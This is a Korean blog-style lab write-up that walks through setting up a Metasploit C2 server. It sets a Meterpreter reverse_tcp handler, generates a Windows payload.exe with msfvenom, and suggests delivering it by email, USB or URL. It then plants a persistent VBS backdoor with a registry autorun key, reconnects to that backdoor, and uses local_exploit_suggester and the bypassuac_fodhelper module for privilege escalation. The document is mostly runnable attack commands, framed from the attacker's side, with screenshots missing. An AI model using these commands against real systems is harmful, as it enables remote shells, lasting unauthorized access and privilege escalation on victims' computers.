[MSF]메타스플로잇 환경에서 C2 서버와 클라이언트 서버 구축하기

메타스플로잇 시작 명령어 msfconsole을 실행하면 위와 같은 화면이 뜨면 정상적으로 실행한 거다.

 

 

 

익스플로잇 핸들러 설정하기.

피해자 시스템의 연결을 수신하려면 익스플로잇 핸들러를 설정해야 합니다. 역방향 TCP 페이로드를 사용할 예정!

 

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444

 

Windows용 페이로드를 만들 예정이다. (Meterpreter를 사용해서!)

이 페이로드는 피해자의 컴퓨터에서 실행되면 C2 서버에 다시 연결되도록 해준다.

C2 서버의 수신 주소를 구성하기 위해서는 LHOST, LPORT 설정이 필요하다.

LHOST는 Kali 머신 IP 주소로 지정해주었고, LPORT는 나중에 변경가능하다길래 일단 수신 포트 4444(default)로 해주었다.

 

그 후 핸드러를 실행해주었다. exploit -j

페이로드 및 수신 매개변수를 설정 후에 핸들러를 시작하여 들어오는 연결을 수신할 수 있다.

그러면 백그라운드에서 익스플로잇 핸들러가 실행되어 피해자가 연결될 때까지 기다린다.

 

 

 

 

2. 피해자를 위한(?) 페이로드 생성

이제 피해자 측에서 설정을 해주어야 한다.

MSFVenom을 사용하여 페이로드를 생성해보겠다.

Windows 시스템에서 실행될 때 C2 서버에 다시 연결하는 악성 실행 파일을 생성하게 된다.

 

LHOST = Kali Linux 머신 IP 주소

LPORT = 시스템이 수신 대기 중인 포트

-f exe = Windows 실행 파일을 지정

-o payload.exe = 출력 파일 이름을 payload.exe로 지정

 

페이로드(payload.exe)를 피해자의 컴퓨터에 전달해야 한다. 이 전달은 이메일 첨부 파일, USB, URL 등등의 방식을 통해 수행될 수 있다.

피해자가 payload.exe를 실행하면 Kali Linux의 C2 서버에 다시 연결을 시도한다.

 

 

우오ㅏ22

 

우와 신기하다!!

 

 

 

내친김에 백도어도 해보자.

백도어를 만들기 위해서는 세션 아이디를 알아야한다.

 

 

 

자축!!!~~

exploit/windows/local/persistence 모듈을 사용하여 영구 백도어를 성공적으로 설정했다

 

VBS 스크립트 생성됨: VBS(Visual Basic Script) 파일이 Windows 대상 C:\Users\victim\AppData\Local\Temp\ 디렉터리에 파일 이름 RoTRQVJ.vbs로 기록되었으며, 이 스크립트는 사용자 로그인 시 자동으로 실행되는 백도어다다

 

 

아까도 말했듯이 RoTRQVJ.vbs라는 이름의 VBS 스크립트가 생성되었다(Visual Basic Script)

이 스크립트는 사용자 로그인 시 자동으로 실행되는 백도어다!!

 

그리고 Windows 레지스트리에 자동 실행 항목이 생성되었다.(밑줄부분)

이걸 레지스트리 키라고 부르는데 이건 피해자가 Window 로그인할 때마다 VBS 백도어 스크립트가 실행되어 지속성을 유지하도록 보장하는 거다!(SYSTEM, USER 버전중 난 USER골라서 이렇게 됨여)

 

RC 파일 생성됨: Meterpreter 리소스(RC) 파일도 생성됨. 이 RC 파일에는 Metasploit이 나중에 세션을 다시 설정하기 위해 자동으로 실행할 수 있는 명령이 포함되어있으며 RC 파일은 다음 위치에 저장된다.

/root/.msf4/logs/persistence/DESKTOP-F1V9586_20241013.2838

 

 

내가 만든 백도어. 쓰는 방법도 알아야겠지?

1. use exploit/multi/handler

2.set PAYLOAD windows/meterpreter/reverse_tcp

백도어를 생성할 때 사용된 것과 일치하도록 페이로드를 설정

3.set LHOST 192.168.86.130  # (your attacking machine's IP) 백도어가 다시 연결할 LHOST 및 LPORT(IP 주소 및 포트)를 지정해야 합니다. 이는 백도어를 생성할 때 사용한 설정과 일치해야 함!!
set LPORT 4444            # (the port you configured for the backdoor) 

4.exploit -j  들러를 시작하여 들어오는 연결을 수신

 피해자가 로그인하여 백도어를 실행할 때까지 대기

5.sessions -l 활성 세션이 나열되어 있으면 백도어가 리스너에 성공적으로 연결되었음을 의미

6. sessions -i <session_id>

 

세션과 상호작용

생성 완

 

접근 권한이 낮은 사용자로 접근이 가능한지 테스트 해보자.

액세스 거부 확인

 

 

권한상승전에는 아래와 같음

 

권한 상승을 해야 됨

 

이 시나리오에서는 권한 상승을 통해 루트 권한을 획득해야만 secret.txt 파일을 볼 수 있다.

 

권한 상승을 위한 단계

0. local_exploit_suggester ? 

먼저 시스템에서 사용 가능한 권한 상승 취약점(Local 취약점) 을 찾아야 한다.

Meterpreter Shell에서 사용 가능한 모듈 중 이러한 과정을 자동화한 모듈, local_exploit_suggester를 사용하면 된다.

local_exploit_suggester을 통해 로컬 시스템 취약점을 쉽게 찾을 수 있고 post 모듈 중 recon에 해당한다.

 

1. 백그라운드로 보내기

현재 나는 meterpreter 콘솔에 머물러있다.

 

여기서 주의해야 할 점은 local_exploit_suggester는 Meterpreter 콘솔에서 사용되는 모듈일뿐이지 Meterpreter 세션 내에서 쓸 수 있는 모듈이 아니라는 점이다!

그래서 Meterpreter에서 직접 로드하는 게 아니라 Metasploit 콘솔에서 사용해야 한다. (어쩐지 Tab키가 안먹더라 ㅠㅠ)

 

Meterpreter 세션을 백그라운드로 보내서 사용하면 된다.

 

2. use post/multi/recon/local_exploit_suggester

use post/multi/recon/local_exploit_suggester

 

 

1

local_exploit_suggester는 대상 시스템에 대해 총 196개의 검사를 실행하고 잠재적 취약점 하나 ' exploit/windows/local/bypassuac_fodhelper '를 식별해냈다.

 

exploit/windows/local/bypassuac_fodhelper는 대상이 UAC 우회에 취약한 것으로 나타남을 의미한다. 이를 통해 UAC 프롬프트를 트리거하지 않고도 상승된 권한으로 명령을 실행할 수 있게 된다.

 

찾은 익스플로잇을 사용해보자.

이 취약점과 가장 관련 깊은 익스플로잇은 bypassuac_fodhelper다.

이 모듈을 로드하여 실행해보자.

 

bypassuac_fodhelper 실행하기

use exploit/windows/local/bypassuac_fodhelper

해당하는 세션 아이디가 1여서 1로 바로 지정

 

 

 

 

 

chcp 65001

추가로 칼리측 한글 설정(윈도우는 따로해줘야함 이거깨지는거쩔수없음 난독화아님)

 

에러